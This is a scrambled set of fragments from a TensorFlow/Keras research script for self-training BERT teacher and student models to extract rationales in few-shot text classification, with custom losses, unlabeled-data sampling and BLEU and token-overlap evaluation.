shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus,", "1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': custom_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier':", "acc (task) {}\".format(test_task_acc)) if test_task_acc >= max_best_acc: max_best_acc = test_task_acc model_file = os.path.join(model_dir,", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'l2_distance': custom_loss}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance':None}) #model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),", "= model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val", "best_val_acc = 0. best_test_acc = 0. max_test_acc = 0. max_task_acc = 0. max_best_acc", "temp['truth'] = truth[i] temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_'+type_+'.json'),", "in type_ : acc, y_pred = model.predict(X_unlabeled, batch_size=256) #y_val = np.amax(acc, axis=-1) #y_rat", "np.random.choice(len(X_unlabeled_sample['input_ids']), unsup_size, replace=False) X_batch, y_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_batch[indices]", "score of rationales on test set (student model): {} \".format(score4/len(pred))) data = []", "validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0],", "0, 0, 0] if '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0, 0]", "y_rat = np.array(y_pred).astype('float') #y_rat = y_rat[:,1:] #y_pred = y_pred[:,1:] else: out = model.predict(X_unlabeled_sample,", "model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0)[-3] if '_neg' in type_: y_neg_dev = np.full((len(y_dev),", "os, sys import json import nltk import tensorflow as tf import tensorflow.keras as", "\"attention_mask\": X[\"attention_mask\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:]}, y[train_size:]", "dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "{} {}\".format(X_dev[\"input_ids\"].shape, y_dev.shape)) logger.info(\"X Test Shape: {} {}\".format(X_test[\"input_ids\"].shape, y_test.shape)) logger.info (\"X Unlabeled Shape:", "0.0, 0.0, 0.0] elif '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0, 0]", "[],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] for j in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1:", "X_negation_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, X_negation_sample[\"input_ids\"][i, 1:], 103) X_negation_sample[\"input_ids\"][:,0] = 101 X_sample[\"input_ids\"][:,0] = 101", "tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.Mean(name='mean')]) #X_batch.update(X_rationale_batch) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] model.fit(x=X_batch, y=[y_batch[:,0],", "1.0, 1.0] if '_noexp' in type_: loss_weights = [1.0, 0.0, 0.0, 0.0] elif", "confidence on {} number of instances\".format(len(X_unlabeled[\"input_ids\"]))) X_unlabeled_sample = X_unlabeled #X_unlabeled_sample = {'input_ids': X_unlabeled[\"input_ids\"][indices],", "\"attention_mask_r\":X[\"attention_mask_r\"][train_size:], \"input_ids_neg\":X[\"input_ids_neg\"][train_size:], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][train_size:], \"attention_mask_neg\":X[\"attention_mask_neg\"][train_size:]}, y[train_size:] elif 'joint' in type_: X_train, y_train = {\"input_ids\":", "model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[0] elif '_neg' in type_: out = model.evaluate(X_test, [y_test[:,0], y_test[:,1:],", "= model.predict(X_test) class_acc, test_pred, r_acc = out[0], out[1], out[2] class_acc = np.argmax(class_acc, axis=-1)", "to {}\".format(model_file)) best_val_acc = 0. best_test_acc = 0. max_test_acc = 0. max_task_acc =", "if unsup_size < len(X_unlabeled_sample['input_ids']): '''X_unlabeled_sample, y_pred = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]},", "'joint' in type_: _placeholder_labels = np.empty((y_train.shape[0], y_train.shape[0])) model.fit(x=X_train, y=[y_train[:,0], y_train, y_train[:,0], np.ones(len(y_train))], shuffle=True,", "in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_joint(TFModel, Config,", "val_loss)) if val_loss[0] < best_validation_loss: best_base_model = model best_validation_loss = val_loss[0] model =", "X_conf[:,0] = np.where(log_probs>0, log_probs, 0.00000001) if 'norm' in type_: X_conf[:,0] = tf.nn.softmax(X_conf[:,0], axis=0)", "= [1.0, 1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': rat_loss, 'rationale_task_classifier':", "\"attention_mask_neg\":X[\"attention_mask_neg\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:],", "0.01*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus))", "np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) logger.info(\"Best task acc", "acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices][:, 1:]), axis=1) logger.info(\"y_batch shape: {}\".format(y_batch.shape)) #X_batch, y_batch, X_conf", "acc (task) {}\".format(task_acc)) max_task_acc = task_acc model.save_weights(model_file_best) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2]", "X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size], \"input_ids_neg\":X[\"input_ids_neg\"][:train_size],", "\"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size], \"input_ids_neg\":X[\"input_ids_neg\"][:train_size], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][:train_size], \"attention_mask_neg\":X[\"attention_mask_neg\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:],", "< best_validation_loss: best_base_model = model best_validation_loss = val_loss[0] model = best_base_model ''' if", "model.predict(X_test)[1] class_acc = np.argmax(class_acc, axis=-1) elif 'joint' in type_: out = model.predict(X_test) class_acc,", "import precision_recall_fscore_support logger = logging.getLogger('STRationale') def create_learning_rate_scheduler(max_learn_rate=5e-5, end_learn_rate=1e-7, warmup_epoch_count=10, total_epoch_count=90): def lr_scheduler(epoch): if", "max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) loss_weights = [1.0, 1.0, 1.0, 1.0] if '_noexp'", "batch_size=sup_batch_size*1, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)]) #, class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev),", "== 0: logger.info(model.summary()) model_file = os.path.join(model_dir, \"model_label.h5\") model_file_task = os.path.join(model_dir, \"model_task.h5\") model_file_best =", "0, 0, 0 pred_1, pred_0, truth_1, truth_0 = 0, 0, 0, 0 for", "if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved to {}\".format(model_file)) best_val_acc = 0.", "max_best_acc = 0. val_loss = 0. if 'mtl' in type_: logger.info(\"y_test: {}\".format(y_test)) test_acc", "logger.info(\"Model performance for task (macro/task): {}\".format(precision_recall_fscore_support(acc1, y_test[:,0], average='macro'))) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:],", "{}\".format((tp)/(tp+(0.5*(fp+fn))))) logger.info(\"Rationale coverage (recall): {}\".format(r)) logger.info(\"Token Precision: {}\".format(p)) logger.info(\"Token overlap: {}\".format(tp/(tp+fp+fn))) score1, score2,", "{}\".format(model_file)) continue if 'mtl' in type_ : acc, y_pred = model.predict(X_unlabeled, batch_size=256) #y_val", "r_acc = out[0], out[1], out[2] #y_val = np.amax(acc, axis=-1) #y_rat = np.amax(y_pred, axis=-1)", "batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) elif 'joint_neg' in type_: logger.info(\"Training for without", "logger.info (\"Model file saved to {}\".format(model_file)) model_student = model model_student.load_weights(model_file_best) if 'mtl' in", "from {} unlabeled instances\".format(sample_size, len(X_unlabeled[\"input_ids\"]))) indices = np.random.choice(len(X_unlabeled[\"input_ids\"]), sample_size, replace=False) if '_neg' in", "indx = indx[:unsup_size] logger.info(\"Shape of predicted labels for class {} : {}\".format(i, len(indx)))", "shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)])", "truth.append(' '.join(temp_t)) for word in temp_p: if word in temp_t: ct+=1 temp_t.remove(word) else:", "y_train[:,0], y_neg], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc',", "0.0, 0.0] elif '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0, 0] model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5,", "= 0. if 'mtl' in type_: logger.info(\"y_test: {}\".format(y_test)) test_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]],", "loss_weights = [1.0, 0, 0, 0] if '_no_suffcomp' in type_: loss_weights = [1.0,", "cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) rat_loss = None if 'focal' in", "N_base=10, dense_dropout=0.5, attention_probs_dropout_prob=0.3, hidden_dropout_prob=0.3, test_data=None, unlabeled_data=None, class_weight=None, type_=\"token\", X_dev=None, y_dev=None, task=None): #labels =", "= np.random.choice(len(X_unlabeled[\"input_ids\"]), sample_size, replace=False) if '_neg' in type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices],", "truth[i] temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_teacher_'+type_+'.json'), 'w') as", "= acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices]), axis=1) X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices],", "logger.info (\"Test acc (task) {}\".format(test_task_acc)) if test_task_acc >= max_best_acc: max_best_acc = test_task_acc model_file", "model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc", "in type_: out = model.predict(X_unlabeled, batch_size=64) acc, y_pred, r_acc = out[0], out[1], out[2]", "(student model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on test set (student model):", "import numpy as np import os, sys import json import nltk import tensorflow", "= max_learn_rate*math.exp(math.log(end_learn_rate/max_learn_rate)*(epoch-warmup_epoch_count+1)/(total_epoch_count-warmup_epoch_count+1)) return float(res) learning_rate_scheduler = tf.keras.callbacks.LearningRateScheduler(lr_scheduler, verbose=1) return learning_rate_scheduler def train_model(max_seq_length, X,", "1: temp_p.append(temp[j]) if y_test[i][j+1] == 1: #to skip evaluation of the task label", "if 'mtl' in type_: acc, y_pred = model_student.predict(X_test) y_pred = np.argmax(y_pred, axis=-1) acc", "reduction=tf.keras.losses.Reduction.NONE) tf.print(tf.size(y_true), tf.size(y_pred)) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss =", "test_task_acc model_file = os.path.join(model_dir, \"model_token_{}_{}.h5\".format(epoch, sample_scheme)) model_file_task = os.path.join(model_dir, \"model_task_{}_{}.h5\".format(epoch, sample_scheme)) if os.path.exists(model_file):", "uniformly\") if unsup_size < len(X_unlabeled_sample['input_ids']): '''X_unlabeled_sample, y_pred = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\":", "None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights", "{}\".format(X_dev[\"input_ids\"].shape, y_dev.shape)) logger.info(\"X Test Shape: {} {}\".format(X_test[\"input_ids\"].shape, y_test.shape)) logger.info (\"X Unlabeled Shape: {}\".format(X_unlabeled[\"input_ids\"].shape))", "= model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] ''' if val_loss < best_loss: best_loss", "r_acc1 = np.argmax(r_acc1, axis=-1) logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='micro'))) logger.info(\"Model", "model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[3] val_loss = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[0] elif '_neg' in", "= {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} else: indices = np.array([i for i", "def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) if 'focal' in type_: cce =", "data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_teacher_'+type_+'.json'), 'w') as f: json.dump(data, f) model_student = None #", "X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} elif 'joint' in type_: acc", "= 0. val_loss = 0. if 'mtl' in type_: logger.info(\"y_test: {}\".format(y_test)) test_acc =", "= task_acc model.save_weights(model_file_best) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] test_task_acc = model.evaluate(X_test, [y_test[:,0],", "'_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier':", "y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:],", "model = best_base_model ''' if 'mtl' in type_: logger.info (\"Best validation acc for", "= 0, 0, 0, 0 for i in range(len(test_pred)): temp_p, temp_t, ct =", "performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='macro'))) logger.info(\"Model performance for task (macro/task): {}\".format(precision_recall_fscore_support(acc1,", "return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) rat_loss = None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2)", "file saved to {}\".format(model_file)) best_val_acc = 0. best_test_acc = 0. max_test_acc = 0.", "class_acc = np.argmax(class_acc, axis=-1) logger.info(\"Class predictions shape {}\".format(class_acc.shape)) logger.info(\"Teacher model best score (macro/task):", "X_unlabeled, model_dir, tokenizer, sup_batch_size=4, unsup_batch_size=32, unsup_size=4096, sample_size=16384, TFModel=TFBertModel, Config=BertConfig, pt_teacher_checkpoint='bert-base-uncased', sample_scheme='easy_bald_class_conf', T=30, alpha=0.1,", "y_test[:,0], np.full((len(y_test),len(labels)), 1/len(labels))] test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-2] task_acc =", "\"attention_mask_r\":X[\"attention_mask_r\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:],", "= [1.0, 0, 0, 0] elif '_no_suffcomp' in type_: loss_weights = [1.0, 1.0,", "type_: logger.info (\"Best validation acc for base model {}: {}\".format(best_validation_loss, model.evaluate(X_dev, [y_dev[:,0],y_dev[:,1:]]))) '''", "y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] val_loss =", ": {}\".format(counter, test_acc)) logger.info (\"Best Test task acc for run {} with total", "X_unlabeled_sample['attention_mask'][indices]}, y_batch[indices] if 'joint' in type_: X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\": X_sample['token_type_ids'][indices], \"attention_mask_r\":", "validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss =", "y_test[:,0], np.ones(len(y_test))]) task_acc, test_acc, r_acc = out[3], out[4], out[5] logger.info (\"Test token acc", "X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} else: indices = np.array([i for", "score2, score3, score4 = 0.0, 0.0, 0.0, 0.0 for i in range(len(pred)): score1", "in temp_t: ct+=1 temp_t.remove(word) else: fp+=1 tp +=ct fn += (y_test[i].sum()-ct) p =", "in type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) y_dev_plg", "task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[0] if", "text = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i]) temp = dict() temp['text'] = ' '.join(text) temp['truth'] = truth[i]", "def lr_scheduler(epoch): if epoch < warmup_epoch_count: res = (max_learn_rate/warmup_epoch_count) * (epoch + 1)", "(\"Test token acc for run {} : {}\".format(counter, test_acc)) logger.info (\"Best Test task", "else: logger.info (\"Evaluating confidence on {} number of instances\".format(len(X_unlabeled[\"input_ids\"]))) X_unlabeled_sample = X_unlabeled #X_unlabeled_sample", "test_pred = y_pred #np.argmax(y_pred, axis=-1) logger.info(\"Printing prediction data on student model for run", "X, y X_dev, y_dev = X_dev, y_dev logger.info(\"X Train Shape: {} {}\".format(X_train[\"input_ids\"].shape, y_train.shape))", "p = tp/(tp+fp+0.0000001) r = tp/(tp+fn+0.0000001) logger.info(\"Token-level: {}\".format((tp)/(tp+(0.5*(fp+fn))))) logger.info(\"Rationale coverage (recall): {}\".format(r)) logger.info(\"Token", "#original N_base=10 with strategy.scope(): if 'mtl' in type_: rat_loss = None if 'focal'", "type_: out = model_student.predict(X_test) acc, y_pred, r_acc = out[0], out[1], out[2] logger.info(\"Raw logits:", "'_noexp' in type_: loss_weights = [1.0, 0, 0, 0] elif '_no_suffcomp' in type_:", "= strategy.num_replicas_in_sync logger.info('Number of devices: {}'.format(gpus)) #run the base model n times with", "(\"Val acc (task) {}\".format(task_acc)) logger.info (\"Test acc (task) {}\".format(test_task_acc)) if test_task_acc >= max_best_acc:", "axis=-1) r_acc = np.argmax(r_acc, axis=-1) #y_rat = y_rat[:, 1:] #y_pred = y_pred[:,1:] #", "X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\": X_sample['token_type_ids'][indices], \"attention_mask_r\": X_sample['attention_mask'][indices]} if '_neg' in type_: X_neg_rationale_batch", "y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=sup_batch_size*1, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)]) #, class_weight=class_weight) val_loss =", "= np.concatenate((acc[indices], y_pred[indices][:, 1:]), axis=1) logger.info(\"y_batch shape: {}\".format(y_batch.shape)) #X_batch, y_batch, X_conf = f_(tokenizer,", "'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]}, y_pred[indices] else: logger.info (\"Evaluating confidence on {} number of", "np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) logger.info(\"Best task acc score: {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro')))", "== 1: temp_p.append(temp[j]) if y_test[i][j+1] == 1: temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1", "max_task_acc = 0. max_best_acc = 0. val_loss = 0. if 'mtl' in type_:", "X_conf[:,1:]]) if 'fine_tune_teacher' in type_: rat_loss = None if 'focal' in type_: rat_loss", "for i in range(len(X_test[\"input_ids\"])): text = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i]) temp = dict() temp['text'] = '", "acc score: {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) logger.info(\"Best token acc score: {}\".format(precision_recall_fscore_support(y_pred, y_test[:,1:], average='macro'))) pred,", "rationale from teacher model as input for task: {}\".format(X_negation_sample[\"input_ids\"][:5])) y_mean, y_var, y_T =", "y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat = np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1) y_pred = np.argmax(y_pred,", "\"attention_mask\": negation_mask} for i in range(len(y_pred)): X_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, 103, X_sample[\"input_ids\"][i, 1:])", "\"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\":", "np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) #y_rat = y_rat[:, 1:] #y_pred = y_pred[:,1:]", "= tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) rat_loss = None if 'focal' in type_:", "= model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0) logger.info(\"Print acc (task) for joint {}\".format(temp)) logger.info (\"Val", "test set (student model): {} \".format(score4/len(pred))) data = [] for i in range(len(X_test[\"input_ids\"])):", "np.where(attention_mask_r==0, 1, 0) negation_mask[:,0] = 1 X_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\":", "import f1_score from sklearn.metrics import precision_recall_fscore_support logger = logging.getLogger('STRationale') def create_learning_rate_scheduler(max_learn_rate=5e-5, end_learn_rate=1e-7, warmup_epoch_count=10,", "len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': None},", "[y_test[:,0], y_test, y_test[:,0], np.ones(len(y_test))]) task_acc, test_acc, r_acc = out[3], out[4], out[5] logger.info (\"Test", "{}\".format(epoch)) if type_ == 'mtl': test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-1] task_acc =", "= [] for i in labels: indx = np.where(y_batch[:,0]==i)[0] GLOBAL_SEED = int(os.getenv(\"PYTHONHASHSEED\")) random.Random(GLOBAL_SEED).shuffle(indx)", "y_var, y_T = None, None, None if 'mtl' in type_: acc, y_pred =", "verbose=1) return learning_rate_scheduler def train_model(max_seq_length, X, y, X_test, y_test, X_unlabeled, model_dir, tokenizer, sup_batch_size=4,", "y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) y_dev_plg = [y_dev[:,1:],", "out = y_train acc, y_pred, r_acc = y_train[:,0], y_train[:,1:], y_train[:,0] y_val = acc", "\"model_task.h5\") model_file_best = os.path.join(model_dir, \"model_best.h5\") if os.path.exists(model_file): model.load_weights(model_file) #model_task.load_weights(model_file_task) best_base_model = model logger.info", "SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = None if '_noexp' in type_: loss_weights", "validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:],", "y_batch, y_batch[:, 0], np.ones(len(y_batch))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc',", "test_acc)) logger.info (\"Best Test task acc for run {} with total loss :", "This code base is adapted from UST (https://github.com/microsoft/UST) \"\"\" from collections import defaultdict", "Code for Self-training for Rationale using few-shot learning. This code base is adapted", "1)) logger.info(\"BLEU-1 score of rationales on test set (teacher model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2", "model as input for task: {}\".format(X_sample[\"input_ids\"][:5])) 